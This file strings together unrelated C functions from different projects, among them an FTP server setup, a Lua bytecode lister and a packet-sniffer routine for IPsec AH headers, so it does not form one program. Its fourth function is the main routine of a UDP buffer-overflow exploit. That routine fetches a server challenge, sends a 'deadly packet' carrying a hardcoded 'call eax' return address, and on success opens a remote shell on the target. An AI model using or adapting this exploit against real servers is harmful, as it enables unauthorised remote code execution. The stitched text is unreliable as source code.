int initServ(t_server *serv)
{
int ret;
ret = 0;
serv->data = my_malloc(sizeof(t_data));
serv->pe = getproto("TCP");
if ((serv->fd = socket(AF_INET, SOCK_STREAM, serv->pe->p_proto)) == -1)
{
perror("socket");
exit(1);
}
serv->sin.sin_family = AF_INET;
serv->sin.sin_port = htons(serv->port);
serv->sin.sin_addr.s_addr = INADDR_ANY;
xbind(serv->fd, (const struct sockaddr *)&serv->sin, sizeof(serv->sin));
serv->connect = 0;
if (listen(serv->fd, 1) == -1)
perror("Listen");
serv->len = sizeof(serv->sin_size);
serv->user = "******";
serv->data->pasv = 0;
g_server = serv;
if ((ret = chdir(serv->root)) == -1)
finishhim();
return (0);
}
int ravi_list_code(lua_State *L) {
int pc;
Proto *p;
p = getproto(obj_at(L, 1));
lua_newtable(L);
setnameval(L, "maxstack", p->maxstacksize);
setnameval(L, "numparams", p->numparams);
for (pc = 0; pc<p->sizecode; pc++) {
char buff[100];
lua_pushinteger(L, pc + 1);
lua_pushstring(L, buildop2(p, pc, buff, sizeof buff));
lua_settable(L, -3);
}
return 1;
}
int init_pasv(t_data *data)
{
data->pe = getproto("TCP");
if ((data->fd = socket(AF_INET, SOCK_STREAM, data->pe->p_proto)) == -1)
{
perror("Socket");
exit(1);
}
data->s_in.sin_family = AF_INET;
data->s_in.sin_port = 0;
data->s_in.sin_addr.s_addr = INADDR_ANY;
xbind(data->fd, (const struct sockaddr *)&data->s_in, sizeof(data->s_in));
listen(data->fd, 1);
data->sin_size = sizeof(data->s_in);
getsockname(data->fd, (struct sockaddr *)&data->s_in, &data->sin_size);
printf("port data channel : %d\n", ntohs(data->s_in.sin_port));
data->pasv = 1;
return (ntohs(data->s_in.sin_port));
}
int main(int argc, char *argv[]) {
unsigned char buffrecv[BUFFSZ],
buffsend[sizeof(BOF1) + 64],
challenge[16],
bug,
*bofstr,
*stri,
*strf;
struct sockaddr_in peer;
int sd,
err,
rlen,
bufflen,
proto;
unsigned long offset;
setbuf(stdout, NULL);
if(argc < 2) {
printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT);
exit(1);
}
printf("OK team, follow my command.\n");
srand(time(NULL));
bofstr=BOF1;
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(atoi(argv[2]));
// offset=strtoul(argv[3],NULL,16);
peer.sin_family = AF_INET;
rlen = sizeof(peer);
offset=0x0804AE93; // call eax
printf("Using offset 0x%08x...\n",offset);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
/* GET INFORMATIONS */
err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
proto = getproto(buffrecv);
showinfostring(buffrecv, err);
/* GET CHALLENGE NUMBER */
err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
stri = strchr(buffrecv, 0x20);
if(!stri) stri = buffrecv;
strf = strchr(stri + 1, 0x20);
if(!strf) strf = buffrecv + err;
*strf = 0x00;
strncpy(challenge, stri, 16);
printf("Challenge: %s\n", challenge);
bufflen = snprintf(buffsend,
sizeof(BOF1) + 64,
bofstr,
proto,
challenge,
(long)(rand() << 1) + (rand() & 0xf), /* 31bit */
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF);
if(bufflen < 0) {
fputs("\nError: cannot allocate buffer in memory\n", stdout);
exit(1);
}
printf("Sending deadly packet ... stand by\n");
err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
exec_sh(connect_sh(argv[1]));
return(0);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
printf("Connect: %s\n", buffrecv + 5);
close(sd);
fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
return(0);
}
int
interpret_ah(int flags, uint8_t *hdr, int iplen, int fraglen)
{
/* LINTED: alignment */
ah_t *ah = (ah_t *)hdr;
ah_t *aligned_ah;
ah_t storage; /* In case hdr isn't aligned. */
char *line, *buff;
uint_t ahlen, auth_data_len;
uint8_t *auth_data, *data;
int new_iplen;
uint8_t proto;
if (fraglen < sizeof (ah_t))
return (fraglen); /* incomplete header */
if (!IS_P2ALIGNED(hdr, 4)) {
aligned_ah = (ah_t *)&storage;
bcopy(hdr, &storage, sizeof (ah_t));
} else {
aligned_ah = ah;
}
/*
* "+ 8" is for the "constant" part that's not included in the AH
* length.
*
* The AH RFC specifies the length field in "length in 4-byte units,
* not counting the first 8 bytes". So if an AH is 24 bytes long,
* the length field will contain "4". (4 * 4 + 8 == 24).
*/
ahlen = (aligned_ah->ah_length << 2) + 8;
fraglen -= ahlen;
if (fraglen < 0)
return (fraglen + ahlen); /* incomplete header */
auth_data_len = ahlen - sizeof (ah_t);
auth_data = (uint8_t *)(ah + 1);
data = auth_data + auth_data_len;
if (flags & F_SUM) {
line = (char *)get_sum_line();
(void) sprintf(line, "AH SPI=0x%x Replay=%u",
ntohl(aligned_ah->ah_spi), ntohl(aligned_ah->ah_replay));
line += strlen(line);
}
if (flags & F_DTAIL) {
show_header("AH: ", "Authentication Header", ahlen);
show_space();
(void) sprintf(get_line((char *)&ah->ah_nexthdr - dlc_header,
1), "Next header = %d (%s)", aligned_ah->ah_nexthdr,
getproto(aligned_ah->ah_nexthdr));
(void) sprintf(get_line((char *)&ah->ah_length - dlc_header, 1),
"AH length = %d (%d bytes)", aligned_ah->ah_length, ahlen);
(void) sprintf(get_line((char *)&ah->ah_reserved - dlc_header,
2), "<Reserved field = 0x%x>",
ntohs(aligned_ah->ah_reserved));
(void) sprintf(get_line((char *)&ah->ah_spi - dlc_header, 4),
"SPI = 0x%x", ntohl(aligned_ah->ah_spi));
(void) sprintf(get_line((char *)&ah->ah_replay - dlc_header, 4),
"Replay = %u", ntohl(aligned_ah->ah_replay));
/* * 2 for two hex digits per auth_data byte. */
buff = malloc(auth_data_len * 2);
if (buff != NULL) {
int i;
for (i = 0; i < auth_data_len; i++)
sprintf(buff + i * 2, "%02x", auth_data[i]);
}
(void) sprintf(get_line((char *)auth_data - dlc_header,
auth_data_len), "ICV = %s",
(buff == NULL) ? "<out of memory>" : buff);
/* malloc(3c) says I can call free even if buff == NULL */
free(buff);
show_space();
}
new_iplen = iplen - ahlen;
proto = aligned_ah->ah_nexthdr;
/*
* Print IPv6 Extension Headers, or skip them in the summary case.
*/
if (proto == IPPROTO_HOPOPTS || proto == IPPROTO_DSTOPTS ||
proto == IPPROTO_ROUTING || proto == IPPROTO_FRAGMENT) {
(void) print_ipv6_extensions(flags, &data, &proto, &iplen,
&fraglen);
}
if (fraglen > 0)
switch (proto) {
case IPPROTO_ENCAP:
/* LINTED: alignment */
(void) interpret_ip(flags, (struct ip *)data,
new_iplen);
break;
case IPPROTO_IPV6:
(void) interpret_ipv6(flags, (ip6_t *)data,
new_iplen);
break;
case IPPROTO_ICMP:
(void) interpret_icmp(flags,
/* LINTED: alignment */
(struct icmp *)data, new_iplen, fraglen);
break;
case IPPROTO_ICMPV6:
/* LINTED: alignment */
(void) interpret_icmpv6(flags, (icmp6_t *)data,
new_iplen, fraglen);
break;
case IPPROTO_TCP:
(void) interpret_tcp(flags,
(struct tcphdr *)data, new_iplen, fraglen);
break;
case IPPROTO_ESP:
(void) interpret_esp(flags, data, new_iplen,
fraglen);
break;
case IPPROTO_AH:
(void) interpret_ah(flags, data, new_iplen,
fraglen);
break;
case IPPROTO_UDP:
(void) interpret_udp(flags,
(struct udphdr *)data, new_iplen, fraglen);
break;
/* default case is to not print anything else */
}
return (ahlen);
}